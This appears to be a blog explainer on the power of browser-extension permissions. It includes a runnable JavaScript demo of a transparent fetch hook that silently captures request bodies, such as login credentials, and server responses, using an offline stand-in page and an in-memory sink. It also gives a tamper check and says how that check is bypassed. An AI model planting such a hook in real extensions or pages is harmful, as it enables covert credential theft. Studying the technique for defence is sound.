Modern WebExtensions

From ad-blockers to password managers, millions of users browse the web with the help of browser extensions every single day. Do they realize how much access they’re really giving these applications? Do web stores really do their due diligence when it comes to reviewing extensions? Spoiler: the answer is most likely no.

How much can extensions really access?

The answer here is essentially everything. Well, at least anything a webpage can access. The thing is, as soon as you grant an extension host permissions for a site (the install prompt phrases this as something like "Read and change all your data on all websites"), it can inject any valid JavaScript into that page, either as a content script or through the scripting API. On top of that, it can run that script at document_start, before the page's own scripts have loaded, and it can inject into the page's main world rather than the content script's isolated one, which is what it needs to replace functions the page itself calls.

This means, for example, that a bad actor could:

  1. Overwrite the window.fetch() function to intercept any request the webpage makes, including request bodies and responses, without changing what the page sees
  2. Read input values (like your password) from form fields on a webpage
  3. Read any personal data displayed on the page, including the contents of your password manager's web vault
  4. Perform actions on your behalf by interacting with page elements (clicking buttons, submitting forms)
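To make item 1 concrete, here is an added example of a transparent fetch hook of the kind a malicious extension would inject (it is not code from the original post or from any real extension). It must run in the page's main world, for instance via the scripting API with world: "MAIN" or by injecting a script element from a content script; a content script's own isolated-world window.fetch is a different object and replacing it would not affect the page. The "exfiltration" sink is a plain in-memory array, and the page's fetch and its response are constructed stand-ins, so the script runs offline in Node without touching the network. isNativeFunction is a crude check a page or a defender can run against such tampering; an attacker who also overrides Function.prototype.toString defeats it.

```javascript
// Added example (not from the original post): a transparent hook on fetch.
// The sink is an in-memory array; a real extension would forward the records
// to its background script or a remote server.

// Crude tamper check: native functions stringify to "[native code]", a JavaScript
// wrapper does not. Defeated if the attacker also patches Function.prototype.toString.
function isNativeFunction(fn) {
  return /\[native code\]/.test(Function.prototype.toString.call(fn));
}

// Replace target.fetch with a wrapper that records the URL, method, request body
// and response body of every call into `sink`, then hands the page the very
// response it asked for. Returns the original so the hook can be removed.
function installFetchHook(target, sink) {
  const originalFetch = target.fetch;
  target.fetch = async function hookedFetch(input, init = {}) {
    const record = {
      url: typeof input === "string" ? input : input.url,
      method: (init.method || "GET").toUpperCase(),
      requestBody: init.body ?? null,
      responseBody: null,
    };
    const response = await originalFetch.call(target, input, init);
    // Read the body from a clone so the page's copy is still consumable.
    record.responseBody = await response.clone().text();
    sink.push(record);
    return response;
  };
  return originalFetch;
}

// Constructed stand-in for a Response object (only the methods used here).
function makeFakeResponse(body) {
  return {
    status: 200,
    clone() { return makeFakeResponse(body); },
    async text() { return body; },
    async json() { return JSON.parse(body); },
  };
}

// Constructed stand-in for the page's window: its "server" echoes the request
// body back inside a JSON envelope, so there is no network access.
const fakeWindow = {
  async fetch(input, init = {}) {
    return makeFakeResponse(JSON.stringify({ ok: true, echoed: init.body ?? null }));
  },
};

// Simulated victim page: it logs in exactly as it would without the hook.
async function pageLogin(win) {
  const res = await win.fetch("https://example.test/api/login", {
    method: "POST",
    body: JSON.stringify({ user: "alice", password: "hunter2" }),
  });
  return res.json();
}

// Install the hook, run the page's login, and return what each side observed.
async function demo() {
  const stolen = [];
  installFetchHook(fakeWindow, stolen);
  const pageResult = await pageLogin(fakeWindow);
  return { pageResult, stolen, hookLooksNative: isNativeFunction(fakeWindow.fetch) };
}

if (typeof require !== "undefined" && require.main === module) {
  demo().then((r) => console.log(JSON.stringify(r, null, 2)));
}
```

The page's login succeeds and its response is byte-for-byte what the server returned, while the sink holds the URL, the POSTed credentials and the response body. The same wrapping pattern applies to XMLHttpRequest.prototype.send, WebSocket, or any other API the page calls into.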